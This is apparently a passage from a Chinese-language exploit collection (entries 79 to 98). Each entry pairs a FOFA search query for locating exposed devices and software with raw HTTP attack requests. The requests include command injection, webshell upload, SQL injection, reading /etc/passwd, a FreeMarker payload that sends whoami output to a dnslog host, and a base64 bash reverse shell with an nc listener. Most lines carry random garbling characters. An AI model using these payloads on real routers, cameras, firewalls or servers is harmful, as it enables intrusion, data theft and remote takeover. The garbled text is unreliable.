+ \( L5 W" ]0 Z/ _ L# S) J6 q- @YsOxWxSvj1KyZow1PTsh98fdu6l
) L2 M; L0 r. D8 |------YsOxWxSvj1KyZow1PTsh98fdu6l
$ q* |! v' e+ h; c- tContent-Disposition: form-data; name="target"
& I0 H, b6 o' o& U1 \+ |0 N1 w9 ?) e/ V* d% Z4 Y/ s
/Applications/SkillDevelopAndEHS/
5 _; ^* J* r1 ]: j1 {5 y------YsOxWxSvj1KyZow1PTsh98fdu6l--
1 `$ d t* q, a' n$ Z* h" W) \8 h4 |8 C( S( b0 P
% n, r) d% J- [" j8 t5 SGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.15 v4 i( ]0 r9 m8 ?6 l, e2 t
Host: x.x.x.x
* t3 j# R# X- D r" i) T) b7 L# ?, S2 b7 D
' i, J* h5 o7 F4 n! W
79. BYTEVALUE 百为流控路由器远程命令执行$ Y. h. Q: `$ j2 `7 o# X( D) d
FOFA:BYTEVALUE 智能流控路由器
& L7 r, p) H- x; C( fGET /goform/webRead/open/?path=|id HTTP/1.1
4 b: A4 o4 Q2 p9 AHost:IP
/ h4 v) k5 C; o$ E w' L' @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0# N, ~- E( z0 ^. l' L8 Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) T5 ^. _; K* m* U4 oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# P3 r( W; R& A2 y- J" o# \
Accept-Encoding: gzip, deflate+ Z- R& N7 c# f& f, W7 U$ q
Connection: close* A% v) P4 w+ U6 G% j4 ` N9 Z
Upgrade-Insecure-Requests: 18 R1 K" {/ W8 [1 }' A
9 _: b, A' a& ~1 G
& e* d: U* f2 ?" B) x
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传, N% Q% m+ e* m Y. c: \0 t
FOFA:app="速达软件-公司产品"9 s! X% u$ |5 y, w$ t, T/ M+ `
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1- {5 O* }& j7 M6 l& N/ k# n
Host: x.x.x.x
1 K Z0 V, |9 W' e& ~! a( B1 R$ gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 ^3 n/ [5 t/ X8 T. D" FContent-Length: 27
( F( U1 H5 i6 t+ R x3 s4 v$ OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. i' ?% q7 o' Z, q) j# L# ]Accept-Encoding: gzip, deflate ~2 {; I E8 x6 E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ [( s4 t/ t3 Q) XConnection: close$ D% r. d7 F5 o
Content-Type: application/octet-stream Y k5 [# p1 `5 e
Upgrade-Insecure-Requests: 1
% i' j1 k4 H$ U6 s# g" w/ U7 }9 H2 \3 O" f+ L5 D) ^
<% out.print("oessqeonylzaf");%>
$ F2 e! u U, ~0 v" {0 B+ ?+ s* _ f/ {9 x8 O' l1 i
0 ]) d, C* H v( U9 H$ b
GET /xykqmfxpoas.jsp HTTP/1.1
5 ]* ~2 L' C- w+ K$ j3 hHost: x.x.x.x8 x. Q! T0 _8 r: H6 s- H, P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! O* ^/ M# |; ^) ?* B9 \, rConnection: close4 s9 S4 O8 D% ? y
Accept-Encoding: gzip5 q, O: |% z+ m, f0 ~
* S6 B a$ j% C# \& c9 Z l
( O5 x- q. ?6 N' _81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露$ U" }" w6 M' O+ V! {1 K& s, h
FOFA:app="uniview-视频监控"4 n6 J Q* }8 {- l; Q2 {& q
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
1 K4 C' s5 |8 I2 t! mHost: x.x.x.x
; Q7 ^* E! A: F! o2 [) s- IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# y4 y2 N2 g% N$ Z
Connection: close. s. O, s, h% S9 J
Accept-Encoding: gzip Z e+ D5 N) j( O. G
8 X9 [& H9 E- J2 T& E
# F: \2 Q! C+ R/ l X. m' q82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
3 J, @5 G4 L- JFOFA:app="思福迪-LOGBASE"9 A$ E: K- D/ g! O) c/ R
POST /bhost/test_qrcode_b HTTP/1.1
# d- P1 d5 r0 F8 @. wHost: BaseURL% |' _* U# q; s! g: ?
User-Agent: Go-http-client/1.1
d1 b6 s4 _7 G0 }* T k4 s6 }8 n4 t/ k" DContent-Length: 233 V- z. a# L V) f9 Z7 W+ {& i
Accept-Encoding: gzip
9 d5 q* B* Z/ p: z6 ^Connection: close
* q9 z" R! d2 ~# ]0 cContent-Type: application/x-www-form-urlencoded0 a6 Q" l- _( z+ S
Referer: BaseURL
8 y$ Z0 w* w6 D- c* _+ ~5 W' Q7 F: X2 K
z1=1&z2="|id;"&z3=bhost
# ~# O" }$ t" K, @+ e/ F/ d( h4 f, A9 }" B# i- ~! s
) Y, ^) U n% R( n2 ^83. JeecgBoot testConnection 远程命令执行- U) v1 v' g( P, @! }- j
FOFA:title=="JeecgBoot 企业级低代码平台"
4 \1 J* s I: {9 \, z
; L/ I. k! M! ?% q# v4 L; n
y! n3 J1 ?3 W" ~" k( p+ x2 g% w9 ~POST /jmreport/testConnection HTTP/1.1 ~$ ?3 u7 J& k8 K9 t1 B
Host: x.x.x.x
3 |; a( C( h$ T& H" L- fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 a* w9 ?. D8 ~' | A4 ~
Connection: close0 k3 h5 i! Q4 q6 K$ ?' c8 q; Q
Content-Length: 8881) Q1 q; y2 d3 {. _* }' Z8 }/ {1 C% [
Accept-Encoding: gzip
+ e( L' \: M1 k) tCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
2 g J8 m- O: E( RContent-Type: application/json
B4 R0 ^: u: S% c: @
1 `2 Q3 {1 ^* M9 B* i/ Z [/ n+ j4 gPAYLOAD
: n' i( S1 i2 g) U j
/ z( ^: u- d7 Z. r84. Jeecg-Boot JimuReport queryFieldBySql 模板注入8 C8 X5 d& t/ x$ Z0 R2 o2 {
FOFA:title=="JeecgBoot 企业级低代码平台"
+ m1 f* n0 p) w! P+ a( }. U7 L0 b' K' |7 s: V
$ M6 @, W+ A; ?* V, X" f/ ^# Y
: `! Z ~2 k; w- g
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.19 o9 Z; N+ J) F
Host: 192.168.40.130:8080- u Q9 d! |7 R% H% Z
User-Agent: curl/7.88.14 v: o0 C# w; I
Content-Length: 1561 ]; Z" Z# A: R, E+ M
Accept: */*+ G0 X1 m F4 R5 d) Z3 w
Connection: close
1 \# S1 q& E: y3 ?Content-Type: application/json
9 j( Z! q/ J1 s" j# a) z% FAccept-Encoding: gzip. G/ N+ @2 B5 d$ l1 ]
% P( E3 l, A" C( n t{
" E4 y! B; ? T1 T) k' L) K" k "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",3 i; a0 y( D6 {4 M
"type": "0"* [2 l+ A$ V& }( c6 K" K+ q$ F% N
}& Q" D) l! y0 g6 y: T
/ X$ F# H5 i; S1 L3 b d( D0 m
2 P+ K1 d f4 c$ m% O* V' r3 W; {85. SysAid On-premise< 23.3.36远程代码执行
8 E6 D' U+ |" m* @" XCVE-2023-47246
) h. b& r# {" j+ XFOFA:body="sysaid-logo-dark-green.png" ) U% P% K0 g" H1 |
EXP数据包如下,注入哥斯拉马
: Q- P8 `, g. l& f }8 @POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1# f- _8 z7 D7 M6 @& K
Host: x.x.x.x
|$ o! Y8 g' R9 q. xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% }' @# ^5 y3 {5 d6 d8 XContent-Type: application/octet-stream
5 R' N+ Q {# ]/ r* N& dAccept-Encoding: gzip
4 C( O# d$ d- m: o( T2 n' \
. J% x/ J) H: hPAYLOAD3 R% q, A2 H; z5 Q
N; f& |3 X; K. S9 `, J
回显URL:http://x.x.x.x/userfiles/index.jsp2 j R$ `; p# z, G: `' p+ \
; o* i3 Z- X% O; K/ M9 o6 X
86. 日本tosei自助洗衣机RCE
8 p. N8 K. _( i9 ^FOFA:body="tosei_login_check.php"5 N: ^, k X+ F) M. J9 [
POST /cgi-bin/network_test.php HTTP/1.1
: A; K9 m6 l4 x# |3 LHost: x.x.x.x) L3 w; n0 O/ K- h- s
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
. U ]+ `/ B4 `# _4 `Connection: close( O# [8 G* N; u3 Y4 `
Content-Length: 444 R4 \9 k i) `$ D/ j* e* C
Accept: */*
7 W: `3 I2 G2 RAccept-Encoding: gzip
+ \8 u+ s: F2 P6 e( WAccept-Language: en$ s# [- v3 J( t# z$ D( Z t9 O
Content-Type: application/x-www-form-urlencoded4 R9 F$ M2 M* t; O
4 `$ K+ Z; i* G( Z
host=%0acat${IFS}/etc/passwd%0a&command=ping
' k3 Q ]/ m3 C% t, |5 N/ d+ v( s$ }( R4 t9 C) S5 n
% ~6 a" v8 c4 ]# I5 ~' @9 }* z87. 安恒明御安全网关aaa_local_web_preview文件上传
, e: b A8 [7 J+ LFOFA:title="明御安全网关"' O9 Z/ E: w2 z4 n( x2 ~( \# l
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.18 p1 J3 h8 e& L; j
Host: X.X.X.X% w) x5 M1 Q! q/ {) g+ [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 ? W9 y* n) S+ m) M9 ?9 M
Connection: close
. K! F2 J! S6 z. S7 o6 V: A! UContent-Length: 198 `. X- `: U7 a7 ^8 ]& b
Accept-Encoding: gzip
3 T3 n5 c. e2 ^/ [4 t. F" PContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
0 X- G( N; z; k) v* b. o7 N5 T2 c$ p2 u# K$ B& i# p! @
--qqobiandqgawlxodfiisporjwravxtvd
" _, Z+ x1 ?( n# r" Y( O+ ~Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"/ M( |# X& X/ y0 {0 j6 d
Content-Type: text/plain
" l- G' n2 [! ?3 x2 J( ^9 \) f; Y( C# @/ g
2ZqGNnsjzzU2GBBPyd8AIA7QlDq! v- _# O l( u% \5 L9 W) q
--qqobiandqgawlxodfiisporjwravxtvd--
6 {0 \- X+ p! @. `+ r |: U5 m( u5 E
. R' Q& G8 H7 ^& A/ G+ w0 _/jfhatuwe.php5 O- ~7 W: A" I3 u( v K" Q8 N. N# L
$ d6 F1 L3 l5 `: p) e
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行2 P6 W1 \& S. L2 j' R" W z
FOFA:title="明御安全网关"
+ x) A( j+ g# nGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
4 L* s6 v- m5 [! E* Z" fHost: x.x.x.xx.x.x.x- C: J1 f* {, o) k" Z. U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- l4 l2 d8 H+ ^7 \, fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; R c7 S9 c6 \! a& z
Accept-Encoding: gzip, deflate
1 |" Y* E: a- W) e" m2 U4 [Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; j+ @0 }5 }9 GConnection: close
1 [; p8 k7 f' q) n) r# q D7 {- Q( f% _' N
1 b2 k% T% L1 u9 S" z+ e/astdfkhl.php4 g6 U' Q; b5 ?3 l* R' n
) |# [0 i# Y) R. ]89. 致远互联FE协作办公平台editflow_manager存在sql注入0 p3 ^, |( K- P( w! [* u" s
FOFA:title="FE协作办公平台" || body="li_plugins_download"2 }* |8 B) L+ h0 x; T1 d
POST /sysform/003/editflow_manager.js%70 HTTP/1.1+ O' |# I2 H X) M8 H
Host: x.x.x.x0 T1 j7 s( {2 N- `; K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 h$ g8 q5 m9 ?: F+ v
Connection: close* l3 H/ I$ b0 A) q+ x) g7 v) x
Content-Length: 41, b9 u! l; ^( p# A. A5 L/ e4 V7 Y
Content-Type: application/x-www-form-urlencoded
* S+ i& j# l, Q' y* I, N( yAccept-Encoding: gzip$ `4 m% I( j! J3 _$ x0 G
& o( e' t: u0 s. B4 J% G( hoption=2&GUID=-1'+union+select+111*222--+) c! z3 h4 [5 n5 K% L& d
, R9 E4 G2 l4 R) q
, Y; H) u, j q* v9 v7 o# j
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行# M$ R. e, |) d0 Q
FOFA:icon_hash="-1830859634") g7 D% \- |' S3 K$ V5 h
POST /php/ping.php HTTP/1.1
4 {1 n( |" ^! N2 |Host: x.x.x.x# K$ q! M) M# [9 W) l9 g& I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
: j5 G6 r3 B7 x" g( V4 L G: oContent-Length: 51" \5 Y) O* F4 p" [6 r, f: i
Accept: application/json, text/javascript, */*; q=0.01' N$ u! H! z9 E6 D
Accept-Encoding: gzip, deflate0 m* S" a3 [4 p+ O) [+ B7 S; k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ N* i" M3 k# V0 c1 l/ G
Connection: close4 V/ ^: a2 D1 o0 D6 u
Content-Type: application/x-www-form-urlencoded
4 N/ w6 n1 v4 V6 C4 VX-Requested-With: XMLHttpRequest- ~$ b* ~2 A6 V. m
- p( L2 ` c P* }jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
! E! a9 _0 v" V- c2 T' @* }& Y
% O+ |' V+ A1 S6 D+ [/ d7 Z6 g
; b# M# Y, P; {, I' z; ^) q91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
2 [) [" J z! O" B" [FOFA:title="综合安防管理平台"
" @" k/ c w! A& u" I$ b7 BGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
% M6 K& B ]& z7 p7 @6 h3 T9 IHost: your-ip# o3 Z/ j/ V- X8 r& L. `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
8 D& a3 d# ]/ p- ] @: O3 }Accept-Encoding: gzip, deflate" G' A: L4 g6 E' X: m
Accept: */*# U+ o0 b' E& S9 w( `7 h
Connection: keep-alive
$ t" c) L2 O' m4 [
: M! c& ]9 I" p/ ]" l0 @4 U, N6 i6 d- |2 I4 p
. D$ T% U) M- f% Z3 @92. 海康威视运行管理中心session命令执行
* ]5 y7 t/ x M0 m5 eFastjson命令执行
: G) `0 t* M9 g" f9 H/ m: xhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"" |2 R9 E9 L) w' ? c) B# v9 i
POST /center/api/session HTTP/1.1& K. I4 T3 @, g& |" D5 q0 e
Host:! A V, p y1 D. F6 `
Accept: application/json, text/plain, */*
2 } ~0 o: g) Z. {Accept-Encoding: gzip, deflate; k9 S1 f8 j2 u0 b# o* Z2 T5 e: W$ h
X-Requested-With: XMLHttpRequest
' u4 q. w3 D2 vContent-Type: application/json;charset=UTF-8
, T( n: |3 i# aX-Language-Type: zh_CN N3 l5 I D4 V
Testcmd: echo test
; T+ }4 E9 n+ X, A* F' B& R @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
, V6 \2 @) t& G0 M( F% MAccept-Language: zh-CN,zh;q=0.92 a3 y$ j( c9 D3 T7 F/ u7 a( w
Content-Length: 5778; D3 T4 b1 T& f! n
4 G% O# V; \0 Z2 }( O- Q. V
PAYLOAD
9 _' e5 V) j9 T2 r2 `8 K, ~; E/ }
' Z# ^# K6 |7 M2 o e# N
+ z" Q# ]: E, q7 b7 B* Y93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传- k U: y8 [8 j$ F, {% e
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
$ u- T2 c g% l9 f$ R dPOST /?g=app_av_import_save HTTP/1.1! Z/ {1 g, v1 Z9 ~3 U {
Host: x.x.x.x9 ^' q8 d" Q, p9 Z5 m: l
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx- s1 K6 s) x/ U" H
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
3 D& D* _8 l( _6 K2 y/ N6 U+ i1 Z0 W+ _+ }$ V' Z
------WebKitFormBoundarykcbkgdfx! b9 x# X( H# D, g
Content-Disposition: form-data; name="MAX_FILE_SIZE"
$ z T: f- |3 `. R7 @: C
6 w: ?' y! Q+ t: M) u9 H10000000
2 [6 y6 ~& R. \6 A------WebKitFormBoundarykcbkgdfx
! i/ s4 ]: `9 _' sContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
% p d6 l) t! s$ PContent-Type: text/plain
* M: \" {. b4 |) W! r0 ?; }% r7 `$ d: ]/ m6 t
wagletqrkwrddkthtulxsqrphulnknxa
" P9 c N& g8 z# J7 T------WebKitFormBoundarykcbkgdfx
3 Y! Q6 g3 B2 I+ c; fContent-Disposition: form-data; name="submit_post"# r$ q& l# f* W
3 P8 [# F) e h4 a! J
obj_app_upfile
- ^( E. g1 Y2 x+ }& h$ X------WebKitFormBoundarykcbkgdfx
9 |! J8 Y' z3 i9 |% X& S8 MContent-Disposition: form-data; name="__hash__"/ t: q* v4 P& I9 V
" ^0 X5 ]4 X. j( `. ?* j: a5 z% n H% C0b9d6b1ab7479ab69d9f71b05e0e9445' o9 `5 R# H* Q) Z5 {) w# D
------WebKitFormBoundarykcbkgdfx--* {# b: U+ n( ?( o$ I- a3 s* M
( l. z7 ^* L: J' a" A$ y; S
, ~; c* ~: N8 M) I/ O' }4 c4 XGET /attachements/xlskxknxa.txt HTTP/1.1 n# A0 R, t) B2 M6 L
Host: xx.xx.xx.xx
$ v1 b; x# k h! I4 Z4 ]4 ^% k: c2 }User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36' R4 s. A H' l. C, q( v @
* q( N u1 A8 b% y: b
9 C( P4 x& B' u; H3 [9 J( v& C94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
+ F8 o" C' l$ h# o6 D# R& HFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
/ N3 h. S) C$ a! V" r: Q+ APOST /?g=obj_area_import_save HTTP/1.1) |; t4 [- J; g& d) F3 v; d
Host: x.x.x.x' W" F. ^, h5 `$ g+ y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
$ m" \, M8 A- A9 r* ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.361 r* a$ G- }! \" f: h: z$ g
8 r" n4 ^: ?/ J
------WebKitFormBoundarybqvzqvmt( o4 u0 S6 U# D) E: s
Content-Disposition: form-data; name="MAX_FILE_SIZE"' A% c. r: Z" r: V4 m) ~4 K% k
4 t6 \" r+ h4 t5 e6 |0 ]
10000000) c5 o- p2 U6 W1 t+ S5 l5 G
------WebKitFormBoundarybqvzqvmt
$ @0 ?7 A6 U8 Q+ h0 Z" kContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
& g# d. B! ^8 U$ L, b; lContent-Type: text/plain
: X) c) b8 R$ B% s6 C: [ p; y# K3 H: D- S, g" t6 K
pxplitttsrjnyoafavcajwkvhxindhmu
4 x8 ?5 L9 x( u* L# u$ y------WebKitFormBoundarybqvzqvmt
/ r, ]2 a& r% Z4 }Content-Disposition: form-data; name="submit_post"' f! G* m( d' a
7 N7 b9 h( M; {% q, {# n7 V& `# Jobj_app_upfile
5 a- E2 |$ N6 r2 o" r' B------WebKitFormBoundarybqvzqvmt, c; u4 O9 k, O/ b
Content-Disposition: form-data; name="__hash__"
* U' i$ J5 \2 O& i6 @) P/ |2 P( h f7 z& D2 P) `
0b9d6b1ab7479ab69d9f71b05e0e9445
0 R) R7 T# T. F3 i; h& o6 _------WebKitFormBoundarybqvzqvmt--
1 t; y! @! o/ K. d% b! y7 G
' C. M& Y2 E3 n& _5 u: r, ]# G2 {0 V
- ^/ w# ?% R4 c* S1 y) Q+ e. Z+ sGET /attachements/xlskxknxa.txt HTTP/1.17 T$ c8 q. X) m$ O3 v0 V( ~5 Z) R
Host: xx.xx.xx.xx
& |% {! H, h5 a. H( XUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.360 L; B1 Y, a0 ~% X$ }
& U( Z `7 H+ I6 l" u2 [' p4 M4 f% z
& n, I8 ]; K3 d' x1 T1 c# P4 Q- r# Q) T
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
9 w' b) d: s5 l5 g+ z4 {CVE-2023-490700 O! v* Q9 t6 S' z
FOFA:app="Apache_OFBiz"
5 o5 ?- y+ J0 _0 j$ n1 z: XPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1; M- r7 G A0 C
Host: x.x.x.x2 l# V# ^0 C% r3 ]& K% Z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
4 V) P7 {0 {& gConnection: close) Z3 ?' R9 z5 o
Content-Length: 889# O$ C3 v1 t/ H5 I. N- |) u' L
Content-Type: application/xml( A2 b& ~. A2 H7 r4 ]6 q1 w
Accept-Encoding: gzip
! E$ t+ r( u' S3 W" L! N- A+ ~' u7 ~- T9 v8 \$ m9 l
<?xml version="1.0"?>
% m% P# [& z5 `<methodCall>
, P& { p) q) o# p6 C2 ^) o <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
7 E7 U# e8 f2 _8 \* n, Z- c <params>
- l* Z, o5 H) K/ i+ U <param>
; @( v/ x# M( T; K <value> N0 R/ J3 E5 ]! Q
<struct>6 E$ w. D* |9 [* ]7 A! [7 q# z
<member>
. A6 @1 b; r& U& o, y8 c <name>test</name>3 W. h, |6 K, F; w7 _
<value>( y9 g) t) d0 e' V0 R
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
$ Q9 c8 W3 X( c7 P, }" n5 O- I </value>/ O7 w/ R4 C. t# A) I+ _# D
</member> t$ C$ h0 W2 C) V4 [' w
</struct>
3 v5 o. `; a2 |# Q </value>; p7 i& |: m) c" z# M4 V2 {
</param>+ w# V- q" t7 W' K3 T
</params>
0 t2 b8 s' F, D, L</methodCall>7 _7 C6 ?% h5 q7 s
+ y. J7 t3 X. M6 c: F
9 C- u- q2 B6 @- I0 p
用ysoserial生成payload4 V/ @2 ?( P) R8 A% w& t2 M4 V
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
( L! D1 p% ?7 c: f I1 [
. P: \8 m5 X+ u
7 T" M/ T. Y% P, e: E o2 X' r将生成的payload替换到上面的POC
& X* v0 Z; D3 W7 d5 A: j' bPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
" }5 E+ y+ v! Q/ iHost: 192.168.40.130:8443) W+ Y( J& }- q, H3 f) \
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.362 v# Z7 {7 ]+ q' Z
Connection: close" O1 J" H' G3 v
Content-Length: 889- @% C* Z" T! U; `4 c2 c% `* t) U, O% @3 h
Content-Type: application/xml4 `2 b8 d% K6 V$ S
Accept-Encoding: gzip
$ i, V$ b+ I; g& P$ p: u" f7 v( T) N6 b
PAYLOAD
- e3 K+ s" N1 `! f
, G& q- V V* }. Q! p. J/ M6 m96. Apache OFBiz 18.12.11 groovy 远程代码执行
9 b, d6 c# W# n3 D) c5 z4 h! sFOFA:app="Apache_OFBiz"
4 y0 i9 M$ ~6 K/ ~POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1% n& i" Y5 J' e: p6 {# s0 r' F% w
Host: localhost:8443; f. B+ E* k" `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0* D4 a; Q! J8 N4 L. t( G$ P3 I
Accept: */*4 S( d! e& l- p5 \ C( [4 q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ ?! K9 G/ D1 {5 s: c
Content-Type: application/x-www-form-urlencoded
5 a/ [4 {+ ~, j$ Q' Z; _0 o6 {Content-Length: 55
+ H" W4 Y0 u& C% x! C) U7 ]* D4 f& t
/ a( d* r/ P8 P! R* D/ W9 AgroovyProgram=throw+new+Exception('id'.execute().text);8 ?* H4 K; J4 c: J; [9 d4 b' p
7 @% X1 E5 Q+ N0 h) l/ T9 n3 I
7 i- I- Z- {( l) x9 H) Y
反弹shell* v7 G }: y7 ^. j0 E
在kali上启动一个监听5 f f$ `* V* X: O' @1 [
nc -lvp 7777
% f# l; }/ Y$ y7 i% k, ?. P: \( b2 o( ?$ K5 p8 n, f7 E
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
- `3 O9 C# L% y2 C1 P2 _( Q KHost: 192.168.40.130:84434 [. u0 h- ]- ^' t. S9 `& A0 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0- @8 q" P3 I8 x- c1 Z" e
Accept: */*- H6 r& s' t( T* n* j: \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 r2 o2 Y% u( W% gContent-Type: application/x-www-form-urlencoded$ ?9 r; l4 w* w9 e
Content-Length: 71
& \; J2 [2 @5 W1 Z& V1 N& r- w! i/ E, _
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();! j* [. f7 u- k' D! ]8 T
% |3 M N5 t! A0 Y
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
9 l; T( @ C3 Z+ ^+ LFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"/ h# V. |, _8 q' t' t
GET /passport/login/ HTTP/1.1
' l7 ~0 d3 q z6 Z. h# L, O4 oHost: 192.168.40.130:8085
1 n+ ?/ G$ K7 L- Y; F% O& e# P8 PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
w9 t8 f' e3 K/ r1 `9 I3 E. |# s& vAccept-Encoding: gzip8 @4 ]5 ]0 H# ]: _% e3 ?9 F
Connection: close: {& H3 S; @( N; L1 x) {
Cookie: rememberMe=PAYLOAD
5 k. N, ]- b' F9 `0 N' }- uX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"- k8 W; }- s5 ?
% Z, ?1 X1 }( M* O
6 u# O A1 j2 q7 ]# R( e
98. SpiderFlow爬虫平台远程命令执行* W% s; t- @7 p2 Y% @
CVE-2024-01954 t. q0 y( [5 s' G$ L8 \3 Q
FOFA:app="SpiderFlow"
3 {+ t* K: M# ^% a; [2 s4 x" ]POST /function/save HTTP/1.1
( O1 c- T$ Z1 S& q: qHost: 192.168.40.130:8088+ g! P" R Y" p& c* V) n6 b
